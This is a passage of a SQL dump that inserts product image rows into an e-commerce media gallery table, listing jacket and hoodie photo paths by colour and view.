(1808, 90, '/w/h/wh03-red_alt1_1.jpg', 'image', 0),
(1809, 90, '/w/h/wh03-red_back_1.jpg', 'image', 0),
(1810, 90, '/w/h/wh03-green_main_1.jpg', 'image', 0),
(1811, 90, '/w/h/wh03-purple_main_1.jpg', 'image', 0),
(1812, 90, '/w/h/wh03-red_main_1.jpg', 'image', 0),
(1813, 90, '/w/h/wh03-red_alt1_1.jpg', 'image', 0),
(1814, 90, '/w/h/wh03-red_back_1.jpg', 'image', 0),
(1815, 90, '/w/h/wh03-green_main_1.jpg', 'image', 0),
(1816, 90, '/w/h/wh03-purple_main_1.jpg', 'image', 0),
(1817, 90, '/w/h/wh03-red_main_1.jpg', 'image', 0),
(1818, 90, '/w/h/wh03-red_alt1_1.jpg', 'image', 0),
(1819, 90, '/w/h/wh03-red_back_1.jpg', 'image', 0),
(1820, 90, '/w/h/wh03-green_main_1.jpg', 'image', 0),
(1821, 90, '/w/h/wh03-purple_main_1.jpg', 'image', 0),
(1822, 90, '/w/h/wh03-red_main_1.jpg', 'image', 0),
(1823, 90, '/w/h/wh03-red_alt1_1.jpg', 'image', 0),
(1824, 90, '/w/h/wh03-red_back_1.jpg', 'image', 0),
(1825, 90, '/w/h/wh03-green_main_1.jpg', 'image', 0),
(1826, 90, '/w/h/wh03-purple_main_1.jpg', 'image', 0),
(1827, 90, '/w/h/wh03-red_main_1.jpg', 'image', 0),
(1828, 90, '/w/h/wh03-red_alt1_1.jpg', 'image', 0),
(1829, 90, '/w/h/wh03-red_back_1.jpg', 'image', 0),
(1830, 90, '/w/h/wh03-red_main_1.jpg', 'image', 0),
(1831, 90, '/w/h/wh03-red_alt1_1.jpg', 'image', 0),
(1832, 90, '/w/h/wh03-red_back_1.jpg', 'image', 0),
(1833, 90, '/w/h/wh04-blue_main_1.jpg', 'image', 0),
(1834, 90, '/w/h/wh04-blue_alt1_1.jpg', 'image', 0),
(1835, 90, '/w/h/wh04-blue_back_1.jpg', 'image', 0),
(1836, 90, '/w/h/wh04-orange_main_1.jpg', 'image', 0),
(1837, 90, '/w/h/wh04-purple_main_1.jpg', 'image', 0),
(1838, 90, '/w/h/wh04-blue_main_1.jpg', 'image', 0),
(1839, 90, '/w/h/wh04-blue_alt1_1.jpg', 'image', 0),
(1840, 90, '/w/h/wh04-blue_back_1.jpg', 'image', 0),
(1841, 90, '/w/h/wh04-orange_main_1.jpg', 'image', 0),
(1842, 90, '/w/h/wh04-purple_main_1.jpg', 'image', 0),
(1843, 90, '/w/h/wh04-blue_main_1.jpg', 'image', 0),
(1844, 90, '/w/h/wh04-blue_alt1_1.jpg', 'image', 0),
(1845, 90, '/w/h/wh04-blue_back_1.jpg', 'image', 0),
(1846, 90, '/w/h/wh04-orange_main_1.jpg', 'image', 0),
(1847, 90, '/w/h/wh04-purple_main_1.jpg', 'image', 0),
(1848, 90, '/w/h/wh04-blue_main_1.jpg', 'image', 0),
(1849, 90, '/w/h/wh04-blue_alt1_1.jpg', 'image', 0),
(1850, 90, '/w/h/wh04-blue_back_1.jpg', 'image', 0),
(1851, 90, '/w/h/wh04-orange_main_1.jpg', 'image', 0),
(1852, 90, '/w/h/wh04-purple_main_1.jpg', 'image', 0),
(1853, 90, '/w/h/wh04-blue_main_1.jpg', 'image', 0),
(1854, 90, '/w/h/wh04-blue_alt1_1.jpg', 'image', 0),
(1855, 90, '/w/h/wh04-blue_back_1.jpg', 'image', 0),
(1856, 90, '/w/h/wh04-orange_main_1.jpg', 'image', 0),
(1857, 90, '/w/h/wh04-purple_main_1.jpg', 'image', 0),
(1858, 90, '/w/h/wh04-blue_main_1.jpg', 'image', 0),
(1859, 90, '/w/h/wh04-blue_alt1_1.jpg', 'image', 0),
(1860, 90, '/w/h/wh04-blue_back_1.jpg', 'image', 0),
(1861, 90, '/w/h/wh05-orange_main_1.jpg', 'image', 0),
(1862, 90, '/w/h/wh05-purple_main_1.jpg', 'image', 0),
(1863, 90, '/w/h/wh05-white_main_1.jpg', 'image', 0),
(1864, 90, '/w/h/wh05-white_back_1.jpg', 'image', 0),
(1865, 90, '/w/h/wh05-orange_main_1.jpg', 'image', 0),
(1866, 90, '/w/h/wh05-purple_main_1.jpg', 'image', 0),
(1867, 90, '/w/h/wh05-white_main_1.jpg', 'image', 0),
(1868, 90, '/w/h/wh05-white_back_1.jpg', 'image', 0),
(1869, 90, '/w/h/wh05-orange_main_1.jpg', 'image', 0),
(1870, 90, '/w/h/wh05-purple_main_1.jpg', 'image', 0),
(1871, 90, '/w/h/wh05-white_main_1.jpg', 'image', 0),
(1872, 90, '/w/h/wh05-white_back_1.jpg', 'image', 0),
(1873, 90, '/w/h/wh05-orange_main_1.jpg', 'image', 0),
(1874, 90, '/w/h/wh05-purple_main_1.jpg', 'image', 0),
(1875, 90, '/w/h/wh05-white_main_1.jpg', 'image', 0),
(1876, 90, '/w/h/wh05-white_back_1.jpg', 'image', 0),
(1877, 90, '/w/h/wh05-orange_main_1.jpg', 'image', 0),
(1878, 90, '/w/h/wh05-purple_main_1.jpg', 'image', 0),
(1879, 90, '/w/h/wh05-white_main_1.jpg', 'image', 0),
(1880, 90, '/w/h/wh05-white_back_1.jpg', 'image', 0),
(1881, 90, '/w/h/wh05-white_main_1.jpg', 'image', 0),
(1882, 90, '/w/h/wh05-white_back_1.jpg', 'image', 0),
(1883, 90, '/w/h/wh06-purple_main_1.jpg', 'image', 0),
(1884, 90, '/w/h/wh06-purple_alt1_1.jpg', 'image', 0),
(1885, 90, '/w/h/wh06-purple_back_1.jpg', 'image', 0),
(1886, 90, '/w/h/wh06-purple_main_1.jpg', 'image', 0),
(1887, 90, '/w/h/wh06-purple_alt1_1.jpg', 'image', 0),
(1888, 90, '/w/h/wh06-purple_back_1.jpg', 'image', 0),
(1889, 90, '/w/h/wh06-purple_main_1.jpg', 'image', 0),
(1890, 90, '/w/h/wh06-purple_alt1_1.jpg', 'image', 0),
(1891, 90, '/w/h/wh06-purple_back_1.jpg', 'image', 0),
(1892, 90, '/w/h/wh06-purple_main_1.jpg', 'image', 0),
(1893, 90, '/w/h/wh06-purple_alt1_1.jpg', 'image', 0),
(1894, 90, '/w/h/wh06-purple_back_1.jpg', 'image', 0),
(1895, 90, '/w/h/wh06-purple_main_1.jpg', 'image', 0),
(1896, 90, '/w/h/wh06-purple_alt1_1.jpg', 'image', 0),
(1897, 90, '/w/h/wh06-purple_back_1.jpg', 'image', 0),
(1898, 90, '/w/h/wh06-purple_main_1.jpg', 'image', 0),
(1899, 90, '/w/h/wh06-purple_alt1_1.jpg', 'image', 0),
(1900, 90, '/w/h/wh06-purple_back_1.jpg', 'image', 0),
(1901, 90, '/w/h/wh07-gray_main_1.jpg', 'image', 0),
(1902, 90, '/w/h/wh07-gray_alt1_1.jpg', 'image', 0),
(1903, 90, '/w/h/wh07-gray_back_1.jpg', 'image', 0),
(1904, 90, '/w/h/wh07-purple_main_1.jpg', 'image', 0),
(1905, 90, '/w/h/wh07-white_main_1.jpg', 'image', 0),
(1906, 90, '/w/h/wh07-gray_main_1.jpg', 'image', 0),
(1907, 90, '/w/h/wh07-gray_alt1_1.jpg', 'image', 0),
(1908, 90, '/w/h/wh07-gray_back_1.jpg', 'image', 0),
(1909, 90, '/w/h/wh07-purple_main_1.jpg', 'image', 0),
(1910, 90, '/w/h/wh07-white_main_1.jpg', 'image', 0),
(1911, 90, '/w/h/wh07-gray_main_1.jpg', 'image', 0),
(1912, 90, '/w/h/wh07-gray_alt1_1.jpg', 'image', 0),
(1913, 90, '/w/h/wh07-gray_back_1.jpg', 'image', 0),
(1914, 90, '/w/h/wh07-purple_main_1.jpg', 'image', 0),
(1915, 90, '/w/h/wh07-white_main_1.jpg', 'image', 0),
(1916, 90, '/w/h/wh07-gray_main_1.jpg', 'image', 0),
(1917, 90, '/w/h/wh07-gray_alt1_1.jpg', 'image', 0),
(1918, 90, '/w/h/wh07-gray_back_1.jpg', 'image', 0),
(1919, 90, '/w/h/wh07-purple_main_1.jpg', 'image', 0),
(1920, 90, '/w/h/wh07-white_main_1.jpg', 'image', 0),
(1921, 90, '/w/h/wh07-gray_main_1.jpg', 'image', 0),
(1922, 90, '/w/h/wh07-gray_alt1_1.jpg', 'image', 0),
(1923, 90, '/w/h/wh07-gray_back_1.jpg', 'image', 0),
(1924, 90, '/w/h/wh07-purple_main_1.jpg', 'image', 0),
(1925, 90, '/w/h/wh07-white_main_1.jpg', 'image', 0),
(1926, 90, '/w/h/wh07-gray_main_1.jpg', 'image', 0),
(1927, 90, '/w/h/wh07-gray_alt1_1.jpg', 'image', 0),
(1928, 90, '/w/h/wh07-gray_back_1.jpg', 'image', 0),
(1929, 90, '/w/h/wh08-orange_main_1.jpg', 'image', 0),
(1930, 90, '/w/h/wh08-purple_main_1.jpg', 'image', 0),
(1931, 90, '/w/h/wh08-white_main_1.jpg', 'image', 0),
(1932, 90, '/w/h/wh08-white_alt1_1.jpg', 'image', 0),
(1933, 90, '/w/h/wh08-white_alternate_1.jpg', 'image', 0),
(1934, 90, '/w/h/wh08-white_back_1.jpg', 'image', 0),
(1935, 90, '/w/h/wh08-orange_main_1.jpg', 'image', 0),
(1936, 90, '/w/h/wh08-purple_main_1.jpg', 'image', 0),
(1937, 90, '/w/h/wh08-white_main_1.jpg', 'image', 0),
(1938, 90, '/w/h/wh08-white_alt1_1.jpg', 'image', 0),
(1939, 90, '/w/h/wh08-white_alternate_1.jpg', 'image', 0),
(1940, 90, '/w/h/wh08-white_back_1.jpg', 'image', 0),
(1941, 90, '/w/h/wh08-orange_main_1.jpg', 'image', 0),
(1942, 90, '/w/h/wh08-purple_main_1.jpg', 'image', 0),
(1943, 90, '/w/h/wh08-white_main_1.jpg', 'image', 0),
(1944, 90, '/w/h/wh08-white_alt1_1.jpg', 'image', 0),
(1945, 90, '/w/h/wh08-white_alternate_1.jpg', 'image', 0),
(1946, 90, '/w/h/wh08-white_back_1.jpg', 'image', 0),
(1947, 90, '/w/h/wh08-orange_main_1.jpg', 'image', 0),
(1948, 90, '/w/h/wh08-purple_main_1.jpg', 'image', 0),
(1949, 90, '/w/h/wh08-white_main_1.jpg', 'image', 0),
(1950, 90, '/w/h/wh08-white_alt1_1.jpg', 'image', 0),
(1951, 90, '/w/h/wh08-white_alternate_1.jpg', 'image', 0),
(1952, 90, '/w/h/wh08-white_back_1.jpg', 'image', 0),
(1953, 90, '/w/h/wh08-orange_main_1.jpg', 'image', 0),
(1954, 90, '/w/h/wh08-purple_main_1.jpg', 'image', 0),
(1955, 90, '/w/h/wh08-white_main_1.jpg', 'image', 0),
(1956, 90, '/w/h/wh08-white_alt1_1.jpg', 'image', 0),
(1957, 90, '/w/h/wh08-white_alternate_1.jpg', 'image', 0),
(1958, 90, '/w/h/wh08-white_back_1.jpg', 'image', 0);
INSERT INTO `catalog_product_entity_media_gallery` (`value_id`, `attribute_id`, `value`, `media_type`, `disabled`) VALUES
(1959, 90, '/w/h/wh08-white_main_1.jpg', 'image', 0),
(1960, 90, '/w/h/wh08-white_alt1_1.jpg', 'image', 0),
(1961, 90, '/w/h/wh08-white_alternate_1.jpg', 'image', 0),
(1962, 90, '/w/h/wh08-white_back_1.jpg', 'image', 0),
(1963, 90, '/w/h/wh09-green_main_1.jpg', 'image', 0),
(1964, 90, '/w/h/wh09-purple_main_1.jpg', 'image', 0),
(1965, 90, '/w/h/wh09-purple_alt1_1.jpg', 'image', 0),
(1966, 90, '/w/h/wh09-purple_back_1.jpg', 'image', 0),
(1967, 90, '/w/h/wh09-red_main_1.jpg', 'image', 0),
(1968, 90, '/w/h/wh09-green_main_1.jpg', 'image', 0),
(1969, 90, '/w/h/wh09-purple_main_1.jpg', 'image', 0),
(1970, 90, '/w/h/wh09-purple_alt1_1.jpg', 'image', 0),
(1971, 90, '/w/h/wh09-purple_back_1.jpg', 'image', 0),
(1972, 90, '/w/h/wh09-red_main_1.jpg', 'image', 0),
(1973, 90, '/w/h/wh09-green_main_1.jpg', 'image', 0),
(1974, 90, '/w/h/wh09-purple_main_1.jpg', 'image', 0),
(1975, 90, '/w/h/wh09-purple_alt1_1.jpg', 'image', 0),
(1976, 90, '/w/h/wh09-purple_back_1.jpg', 'image', 0),
(1977, 90, '/w/h/wh09-red_main_1.jpg', 'image', 0),
(1978, 90, '/w/h/wh09-green_main_1.jpg', 'image', 0),
(1979, 90, '/w/h/wh09-purple_main_1.jpg', 'image', 0),
(1980, 90, '/w/h/wh09-purple_alt1_1.jpg', 'image', 0),
(1981, 90, '/w/h/wh09-purple_back_1.jpg', 'image', 0),
(1982, 90, '/w/h/wh09-red_main_1.jpg', 'image', 0),
(1983, 90, '/w/h/wh09-green_main_1.jpg', 'image', 0),
(1984, 90, '/w/h/wh09-purple_main_1.jpg', 'image', 0),
(1985, 90, '/w/h/wh09-purple_alt1_1.jpg', 'image', 0),
(1986, 90, '/w/h/wh09-purple_back_1.jpg', 'image', 0),
(1987, 90, '/w/h/wh09-red_main_1.jpg', 'image', 0),
(1988, 90, '/w/h/wh09-purple_main_1.jpg', 'image', 0),
(1989, 90, '/w/h/wh09-purple_alt1_1.jpg', 'image', 0),
(1990, 90, '/w/h/wh09-purple_back_1.jpg', 'image', 0),
(1991, 90, '/w/h/wh10-blue_main_1.jpg', 'image', 0),
(1992, 90, '/w/h/wh10-gray_main_1.jpg', 'image', 0),
(1993, 90, '/w/h/wh10-gray_alt1_1.jpg', 'image', 0),
(1994, 90, '/w/h/wh10-gray_back_1.jpg', 'image', 0),
(1995, 90, '/w/h/wh10-yellow_main_1.jpg', 'image', 0),
(1996, 90, '/w/h/wh10-blue_main_1.jpg', 'image', 0),
(1997, 90, '/w/h/wh10-gray_main_1.jpg', 'image', 0),
(1998, 90, '/w/h/wh10-gray_alt1_1.jpg', 'image', 0),
(1999, 90, '/w/h/wh10-gray_back_1.jpg', 'image', 0),
(2000, 90, '/w/h/wh10-yellow_main_1.jpg', 'image', 0),
(2001, 90, '/w/h/wh10-blue_main_1.jpg', 'image', 0),
(2002, 90, '/w/h/wh10-gray_main_1.jpg', 'image', 0),
(2003, 90, '/w/h/wh10-gray_alt1_1.jpg', 'image', 0),
(2004, 90, '/w/h/wh10-gray_back_1.jpg', 'image', 0),
(2005, 90, '/w/h/wh10-yellow_main_1.jpg', 'image', 0),
(2006, 90, '/w/h/wh10-blue_main_1.jpg', 'image', 0),
(2007, 90, '/w/h/wh10-gray_main_1.jpg', 'image', 0),
(2008, 90, '/w/h/wh10-gray_alt1_1.jpg', 'image', 0),
(2009, 90, '/w/h/wh10-gray_back_1.jpg', 'image', 0),
(2010, 90, '/w/h/wh10-yellow_main_1.jpg', 'image', 0),
(2011, 90, '/w/h/wh10-blue_main_1.jpg', 'image', 0),
(2012, 90, '/w/h/wh10-gray_main_1.jpg', 'image', 0),
(2013, 90, '/w/h/wh10-gray_alt1_1.jpg', 'image', 0),
(2014, 90, '/w/h/wh10-gray_back_1.jpg', 'image', 0),
(2015, 90, '/w/h/wh10-yellow_main_1.jpg', 'image', 0),
(2016, 90, '/w/h/wh10-gray_main_1.jpg', 'image', 0),
(2017, 90, '/w/h/wh10-gray_alt1_1.jpg', 'image', 0),
(2018, 90, '/w/h/wh10-gray_back_1.jpg', 'image', 0),
(2019, 90, '/w/h/wh11-blue_main_1.jpg', 'image', 0),
(2020, 90, '/w/h/wh11-blue_back_1.jpg', 'image', 0),
(2021, 90, '/w/h/wh11-green_main_1.jpg', 'image', 0),
(2022, 90, '/w/h/wh11-orange_main_1.jpg', 'image', 0),
(2023, 90, '/w/h/wh11-blue_main_1.jpg', 'image', 0),
(2024, 90, '/w/h/wh11-blue_back_1.jpg', 'image', 0),
(2025, 90, '/w/h/wh11-green_main_1.jpg', 'image', 0),
(2026, 90, '/w/h/wh11-orange_main_1.jpg', 'image', 0),
(2027, 90, '/w/h/wh11-blue_main_1.jpg', 'image', 0),
(2028, 90, '/w/h/wh11-blue_back_1.jpg', 'image', 0),
(2029, 90, '/w/h/wh11-green_main_1.jpg', 'image', 0),
(2030, 90, '/w/h/wh11-orange_main_1.jpg', 'image', 0),
(2031, 90, '/w/h/wh11-blue_main_1.jpg', 'image', 0),
(2032, 90, '/w/h/wh11-blue_back_1.jpg', 'image', 0),
(2033, 90, '/w/h/wh11-green_main_1.jpg', 'image', 0),
(2034, 90, '/w/h/wh11-orange_main_1.jpg', 'image', 0),
(2035, 90, '/w/h/wh11-blue_main_1.jpg', 'image', 0),
(2036, 90, '/w/h/wh11-blue_back_1.jpg', 'image', 0),
(2037, 90, '/w/h/wh11-green_main_1.jpg', 'image', 0),
(2038, 90, '/w/h/wh11-orange_main_1.jpg', 'image', 0),
(2039, 90, '/w/h/wh11-blue_main_1.jpg', 'image', 0),
(2040, 90, '/w/h/wh11-blue_back_1.jpg', 'image', 0),
(2041, 90, '/w/h/wh12-gray_main_1.jpg', 'image', 0),
(2042, 90, '/w/h/wh12-gray_back_1.jpg', 'image', 0),
(2043, 90, '/w/h/wh12-green_main_1.jpg', 'image', 0),
(2044, 90, '/w/h/wh12-purple_main_1.jpg', 'image', 0),
(2045, 90, '/w/h/wh12-gray_main_1.jpg', 'image', 0),
(2046, 90, '/w/h/wh12-gray_back_1.jpg', 'image', 0),
(2047, 90, '/w/h/wh12-green_main_1.jpg', 'image', 0),
(2048, 90, '/w/h/wh12-purple_main_1.jpg', 'image', 0),
(2049, 90, '/w/h/wh12-gray_main_1.jpg', 'image', 0),
(2050, 90, '/w/h/wh12-gray_back_1.jpg', 'image', 0),
(2051, 90, '/w/h/wh12-green_main_1.jpg', 'image', 0),
(2052, 90, '/w/h/wh12-purple_main_1.jpg', 'image', 0),
(2053, 90, '/w/h/wh12-gray_main_1.jpg', 'image', 0),
(2054, 90, '/w/h/wh12-gray_back_1.jpg', 'image', 0),
(2055, 90, '/w/h/wh12-green_main_1.jpg', 'image', 0),
(2056, 90, '/w/h/wh12-purple_main_1.jpg', 'image', 0),
(2057, 90, '/w/h/wh12-gray_main_1.jpg', 'image', 0),
(2058, 90, '/w/h/wh12-gray_back_1.jpg', 'image', 0),
(2059, 90, '/w/h/wh12-green_main_1.jpg', 'image', 0),
(2060, 90, '/w/h/wh12-purple_main_1.jpg', 'image', 0),
(2061, 90, '/w/h/wh12-gray_main_1.jpg', 'image', 0),
(2062, 90, '/w/h/wh12-gray_back_1.jpg', 'image', 0),
(2063, 90, '/w/j/wj01-blue_main_1.jpg', 'image', 0),
(2064, 90, '/w/j/wj01-red_main_1.jpg', 'image', 0),
(2065, 90, '/w/j/wj01-red_alt1_1.jpg', 'image', 0),
(2066, 90, '/w/j/wj01-red_back_1.jpg', 'image', 0),
(2067, 90, '/w/j/wj01-yellow_main_1.jpg', 'image', 0),
(2068, 90, '/w/j/wj01-blue_main_1.jpg', 'image', 0),
(2069, 90, '/w/j/wj01-red_main_1.jpg', 'image', 0),
(2070, 90, '/w/j/wj01-red_alt1_1.jpg', 'image', 0),
(2071, 90, '/w/j/wj01-red_back_1.jpg', 'image', 0),
(2072, 90, '/w/j/wj01-yellow_main_1.jpg', 'image', 0),
(2073, 90, '/w/j/wj01-blue_main_1.jpg', 'image', 0),
(2074, 90, '/w/j/wj01-red_main_1.jpg', 'image', 0),
(2075, 90, '/w/j/wj01-red_alt1_1.jpg', 'image', 0),
(2076, 90, '/w/j/wj01-red_back_1.jpg', 'image', 0),
(2077, 90, '/w/j/wj01-yellow_main_1.jpg', 'image', 0),
(2078, 90, '/w/j/wj01-red_main_1.jpg', 'image', 0),
(2079, 90, '/w/j/wj01-red_alt1_1.jpg', 'image', 0),
(2080, 90, '/w/j/wj01-red_back_1.jpg', 'image', 0),
(2081, 90, '/w/j/wj02-black_main_1.jpg', 'image', 0),
(2082, 90, '/w/j/wj02-blue_main_1.jpg', 'image', 0),
(2083, 90, '/w/j/wj02-gray_main_1.jpg', 'image', 0),
(2084, 90, '/w/j/wj02-gray_alt1_1.jpg', 'image', 0),
(2085, 90, '/w/j/wj02-gray_back_1.jpg', 'image', 0),
(2086, 90, '/w/j/wj02-black_main_1.jpg', 'image', 0),
(2087, 90, '/w/j/wj02-blue_main_1.jpg', 'image', 0),
(2088, 90, '/w/j/wj02-gray_main_1.jpg', 'image', 0),
(2089, 90, '/w/j/wj02-gray_alt1_1.jpg', 'image', 0),
(2090, 90, '/w/j/wj02-gray_back_1.jpg', 'image', 0),
(2091, 90, '/w/j/wj02-black_main_1.jpg', 'image', 0),
(2092, 90, '/w/j/wj02-blue_main_1.jpg', 'image', 0),
(2093, 90, '/w/j/wj02-gray_main_1.jpg', 'image', 0),
(2094, 90, '/w/j/wj02-gray_alt1_1.jpg', 'image', 0),
(2095, 90, '/w/j/wj02-gray_back_1.jpg', 'image', 0),
(2096, 90, '/w/j/wj02-black_main_1.jpg', 'image', 0),
(2097, 90, '/w/j/wj02-blue_main_1.jpg', 'image', 0),
(2098, 90, '/w/j/wj02-gray_main_1.jpg', 'image', 0),
(2099, 90, '/w/j/wj02-gray_alt1_1.jpg', 'image', 0),
(2100, 90, '/w/j/wj02-gray_back_1.jpg', 'image', 0),
(2101, 90, '/w/j/wj02-black_main_1.jpg', 'image', 0),
(2102, 90, '/w/j/wj02-blue_main_1.jpg', 'image', 0),
(2103, 90, '/w/j/wj02-gray_main_1.jpg', 'image', 0),
(2104, 90, '/w/j/wj02-gray_alt1_1.jpg', 'image', 0),
(2105, 90, '/w/j/wj02-gray_back_1.jpg', 'image', 0),
(2106, 90, '/w/j/wj02-gray_main_1.jpg', 'image', 0),
(2107, 90, '/w/j/wj02-gray_alt1_1.jpg', 'image', 0),
(2108, 90, '/w/j/wj02-gray_back_1.jpg', 'image', 0),
(2109, 90, '/w/j/wj03-blue_main_1.jpg', 'image', 0),
(2110, 90, '/w/j/wj03-orange_main_1.jpg', 'image', 0),
(2111, 90, '/w/j/wj03-red_main_1.jpg', 'image', 0),
(2112, 90, '/w/j/wj03-red_alt1_1.jpg', 'image', 0),
(2113, 90, '/w/j/wj03-red_back_1.jpg', 'image', 0),
(2114, 90, '/w/j/wj03-blue_main_1.jpg', 'image', 0),
(2115, 90, '/w/j/wj03-orange_main_1.jpg', 'image', 0),
(2116, 90, '/w/j/wj03-red_main_1.jpg', 'image', 0),
(2117, 90, '/w/j/wj03-red_alt1_1.jpg', 'image', 0),
(2118, 90, '/w/j/wj03-red_back_1.jpg', 'image', 0),
(2119, 90, '/w/j/wj03-blue_main_1.jpg', 'image', 0),
(2120, 90, '/w/j/wj03-orange_main_1.jpg', 'image', 0),
(2121, 90, '/w/j/wj03-red_main_1.jpg', 'image', 0),
(2122, 90, '/w/j/wj03-red_alt1_1.jpg', 'image', 0),
(2123, 90, '/w/j/wj03-red_back_1.jpg', 'image', 0),
(2124, 90, '/w/j/wj03-blue_main_1.jpg', 'image', 0),
(2125, 90, '/w/j/wj03-orange_main_2.jpg', 'image', 0),
(2126, 90, '/w/j/wj03-red_main_2.jpg', 'image', 0),
(2127, 90, '/w/j/wj03-red_alt1_2.jpg', 'image', 0),
(2128, 90, '/w/j/wj03-red_back_2.jpg', 'image', 0),
(2129, 90, '/w/j/wj03-blue_main_2.jpg', 'image', 0),
(2130, 90, '/w/j/wj03-orange_main_2.jpg', 'image', 0),
(2131, 90, '/w/j/wj03-red_main_2.jpg', 'image', 0),
(2132, 90, '/w/j/wj03-red_alt1_2.jpg', 'image', 0),
(2133, 90, '/w/j/wj03-red_back_2.jpg', 'image', 0),
(2134, 90, '/w/j/wj03-red_main_2.jpg', 'image', 0),
(2135, 90, '/w/j/wj03-red_alt1_2.jpg', 'image', 0),
(2136, 90, '/w/j/wj03-red_back_2.jpg', 'image', 0),
(2137, 90, '/w/j/wj04-orange_main_1.jpg', 'image', 0),
(2138, 90, '/w/j/wj04-red_main_1.jpg', 'image', 0),
(2139, 90, '/w/j/wj04-white_main_1.jpg', 'image', 0),
(2140, 90, '/w/j/wj04-white_alt1_1.jpg', 'image', 0),
(2141, 90, '/w/j/wj04-white_alternate_1.jpg', 'image', 0),
(2142, 90, '/w/j/wj04-white_back_1.jpg', 'image', 0),
(2143, 90, '/w/j/wj04-orange_main_1.jpg', 'image', 0),
(2144, 90, '/w/j/wj04-red_main_1.jpg', 'image', 0),
(2145, 90, '/w/j/wj04-white_main_1.jpg', 'image', 0),
(2146, 90, '/w/j/wj04-white_alt1_1.jpg', 'image', 0),
(2147, 90, '/w/j/wj04-white_alternate_1.jpg', 'image', 0),
(2148, 90, '/w/j/wj04-white_back_1.jpg', 'image', 0),
(2149, 90, '/w/j/wj04-orange_main_1.jpg', 'image', 0),
(2150, 90, '/w/j/wj04-red_main_1.jpg', 'image', 0),
(2151, 90, '/w/j/wj04-white_main_1.jpg', 'image', 0),
(2152, 90, '/w/j/wj04-white_alt1_1.jpg', 'image', 0),
(2153, 90, '/w/j/wj04-white_alternate_1.jpg', 'image', 0),
(2154, 90, '/w/j/wj04-white_back_1.jpg', 'image', 0),
(2155, 90, '/w/j/wj04-orange_main_1.jpg', 'image', 0),
(2156, 90, '/w/j/wj04-red_main_1.jpg', 'image', 0),
(2157, 90, '/w/j/wj04-white_main_1.jpg', 'image', 0),
(2158, 90, '/w/j/wj04-white_alt1_1.jpg', 'image', 0),
(2159, 90, '/w/j/wj04-white_alternate_1.jpg', 'image', 0),
(2160, 90, '/w/j/wj04-white_back_1.jpg', 'image', 0),
(2161, 90, '/w/j/wj04-orange_main_1.jpg', 'image', 0),
(2162, 90, '/w/j/wj04-red_main_1.jpg', 'image', 0),
(2163, 90, '/w/j/wj04-white_main_1.jpg', 'image', 0),
(2164, 90, '/w/j/wj04-white_alt1_1.jpg', 'image', 0),
(2165, 90, '/w/j/wj04-white_alternate_1.jpg', 'image', 0),
(2166, 90, '/w/j/wj04-white_back_1.jpg', 'image', 0),
(2167, 90, '/w/j/wj04-white_main_1.jpg', 'image', 0),
(2168, 90, '/w/j/wj04-white_alt1_1.jpg', 'image', 0),
(2169, 90, '/w/j/wj04-white_alternate_1.jpg', 'image', 0),
(2170, 90, '/w/j/wj04-white_back_1.jpg', 'image', 0),
(2171, 90, '/w/j/wj05-brown_main_1.jpg', 'image', 0),
(2172, 90, '/w/j/wj05-brown_alt1_1.jpg', 'image', 0),
(2173, 90, '/w/j/wj05-brown_back_1.jpg', 'image', 0),
(2174, 90, '/w/j/wj05-green_main_1.jpg', 'image', 0),
(2175, 90, '/w/j/wj05-red_main_1.jpg', 'image', 0),
(2176, 90, '/w/j/wj05-brown_main_1.jpg', 'image', 0),
(2177, 90, '/w/j/wj05-brown_alt1_1.jpg', 'image', 0),
(2178, 90, '/w/j/wj05-brown_back_1.jpg', 'image', 0),
(2179, 90, '/w/j/wj05-green_main_1.jpg', 'image', 0),
(2180, 90, '/w/j/wj05-red_main_1.jpg', 'image', 0),
(2181, 90, '/w/j/wj05-brown_main_1.jpg', 'image', 0),
(2182, 90, '/w/j/wj05-brown_alt1_1.jpg', 'image', 0),
(2183, 90, '/w/j/wj05-brown_back_1.jpg', 'image', 0),
(2184, 90, '/w/j/wj05-green_main_1.jpg', 'image', 0),
(2185, 90, '/w/j/wj05-red_main_1.jpg', 'image', 0),
(2186, 90, '/w/j/wj05-brown_main_1.jpg', 'image', 0),
(2187, 90, '/w/j/wj05-brown_alt1_1.jpg', 'image', 0),
(2188, 90, '/w/j/wj05-brown_back_1.jpg', 'image', 0),
(2189, 90, '/w/j/wj05-green_main_1.jpg', 'image', 0),
(2190, 90, '/w/j/wj05-red_main_1.jpg', 'image', 0),
(2191, 90, '/w/j/wj05-brown_main_1.jpg', 'image', 0),
(2192, 90, '/w/j/wj05-brown_alt1_1.jpg', 'image', 0),
(2193, 90, '/w/j/wj05-brown_back_1.jpg', 'image', 0),
(2194, 90, '/w/j/wj05-green_main_1.jpg', 'image', 0),
(2195, 90, '/w/j/wj05-red_main_1.jpg', 'image', 0),
(2196, 90, '/w/j/wj05-brown_main_1.jpg', 'image', 0),
(2197, 90, '/w/j/wj05-brown_alt1_1.jpg', 'image', 0),
(2198, 90, '/w/j/wj05-brown_back_1.jpg', 'image', 0),
(2199, 90, '/w/j/wj07-orange_main_1.jpg', 'image', 0),
(2200, 90, '/w/j/wj07-purple_main_1.jpg', 'image', 0),
(2201, 90, '/w/j/wj07-purple_alt1_1.jpg', 'image', 0),
(2202, 90, '/w/j/wj07-purple_back_1.jpg', 'image', 0),
(2203, 90, '/w/j/wj07-red_main_1.jpg', 'image', 0),
(2204, 90, '/w/j/wj07-orange_main_1.jpg', 'image', 0),
(2205, 90, '/w/j/wj07-purple_main_1.jpg', 'image', 0),
(2206, 90, '/w/j/wj07-purple_alt1_1.jpg', 'image', 0),
(2207, 90, '/w/j/wj07-purple_back_1.jpg', 'image', 0),
(2208, 90, '/w/j/wj07-red_main_1.jpg', 'image', 0),
(2209, 90, '/w/j/wj07-orange_main_1.jpg', 'image', 0),
(2210, 90, '/w/j/wj07-purple_main_1.jpg', 'image', 0),
(2211, 90, '/w/j/wj07-purple_alt1_1.jpg', 'image', 0),
(2212, 90, '/w/j/wj07-purple_back_1.jpg', 'image', 0),
(2213, 90, '/w/j/wj07-red_main_1.jpg', 'image', 0),
(2214, 90, '/w/j/wj07-orange_main_1.jpg', 'image', 0),
(2215, 90, '/w/j/wj07-purple_main_1.jpg', 'image', 0),
(2216, 90, '/w/j/wj07-purple_alt1_1.jpg', 'image', 0),
(2217, 90, '/w/j/wj07-purple_back_1.jpg', 'image', 0),
(2218, 90, '/w/j/wj07-red_main_1.jpg', 'image', 0),
(2219, 90, '/w/j/wj07-orange_main_1.jpg', 'image', 0),
(2220, 90, '/w/j/wj07-purple_main_1.jpg', 'image', 0),
(2221, 90, '/w/j/wj07-purple_alt1_1.jpg', 'image', 0),
